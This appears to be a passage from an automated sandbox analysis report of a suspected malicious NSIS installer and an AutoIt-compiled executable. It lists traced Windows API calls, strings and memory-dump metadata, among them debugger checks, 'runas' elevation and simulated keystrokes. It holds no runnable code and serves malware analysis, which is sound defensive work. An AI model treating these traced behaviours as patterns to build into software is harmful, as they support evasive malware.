                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: Version
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
• lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
• CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
• lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
APIs
Similarity
• API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
• String ID:
APIs
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
Strings
Similarity
• API ID:
• String ID: P
APIs
Strings
Similarity
• API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
• String ID: -$:$:$?
                                                                                                                                                                                                                                                                                                          • API String ID: 3440502458-92861585
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433BA6
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433BBB
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433C35
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432BEC: GetFullPathNameW.KERNEL32(?,00007FF68C433C67,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C432C4D
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433CCC
                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AA96
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AAE3
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AB6A
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AB91
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D06
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D16
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D2B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D44
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D5D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadImageW.USER32 ref: 00007FF68C433D89
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: RegisterClassExW.USER32 ref: 00007FF68C433DED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433E24: CreateWindowExW.USER32 ref: 00007FF68C433E74
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433E24: CreateWindowExW.USER32 ref: 00007FF68C433EC7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433E24: ShowWindow.USER32 ref: 00007FF68C433EDD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C43477C: Shell_NotifyIconW.SHELL32 ref: 00007FF68C434874
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                          • API String ID: 1593035822-2030392706
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF68C47A57D), ref: 00007FF68C4327B1
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4325EA
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4326F8
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C43270D
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C432786
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ColorProc$LongWindow
                                                                                                                                                                                                                                                                                                          • String ID: +
                                                                                                                                                                                                                                                                                                          • API String ID: 3744519093-2126386893
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1568231622-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1405656091-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _handle_error
                                                                                                                                                                                                                                                                                                          • String ID: !$VUUU$fmod
                                                                                                                                                                                                                                                                                                          • API String ID: 1757819995-2579133210
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF68C472BF0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C46AF34: GetCurrentProcess.KERNEL32(00007FF68C46B0A5), ref: 00007FF68C46AF61
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: *$.$.
                                                                                                                                                                                                                                                                                                          • API String ID: 2518042432-2112782162
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF68C455AC3
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                          • API String ID: 389471666-631824599
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3429775523-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF68C4645EC,?,?,00000000,00007FF68C464669,?,?,?,?,?,00007FF68C4B2A9C), ref: 00007FF68C46BDCF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Time$FileSystem
                                                                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                                                                                                          • API String ID: 2086374402-595813830
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF128
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF133
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF14C
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF15E
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF17F
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF18E
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1B3
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1BE
                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1C6
                                                                                                                                                                                                                                                                                                          • FrameRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1D9
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF1E2
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF68C4E198A,?,?,?,00007FF68C47A2A5), ref: 00007FF68C4DF237
